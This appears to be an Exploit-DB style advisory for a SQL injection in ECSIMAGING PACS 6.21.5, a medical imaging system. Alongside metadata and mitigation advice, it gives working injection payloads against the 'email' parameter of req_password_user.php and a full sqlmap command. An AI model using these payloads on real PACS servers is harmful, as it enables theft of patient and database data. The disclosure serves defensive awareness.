ECSIMAGING PACS 6.21.5 - SQL injection

vendor:

PACS

by:

shoxxdj

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: PACS

Affected Version From: 6.21.5

Affected Version To: 6.21.5 and below

Patch Exists: NO

Related CWE:

CPE: a:ecs_imaging:pacs:6.21.5

Metasploit:

Other Scripts:

Platforms Tested: Linux

2021

ECSIMAGING PACS 6.21.5 – SQL injection

The parameter 'email' in ECSIMAGING PACS Application 6.21.5 and below is vulnerable to SQL injection. The 'selected_db' parameter can be leaked in the parameters.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL injection attacks. Additionally, the application should be kept up to date with the latest patches and security updates.

Source

Exploit-DB raw data:

# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux

ECSIMAGING PACS Application in 6.21.5 and bellow suffers from  SQLinjection vulnerability
The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters )

Payload example : /req_password_user.php?email=test@test.com' OR NOT 9856=9856-- nBwf&selected_db=xtp001
/req_password_user.php?email=test@test.com'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001

SQLMAP :  sqlmap.py -u '<URL>/req_password_user.php?email=test@test.com&selected_db=xtp001' --risk=3 --level=5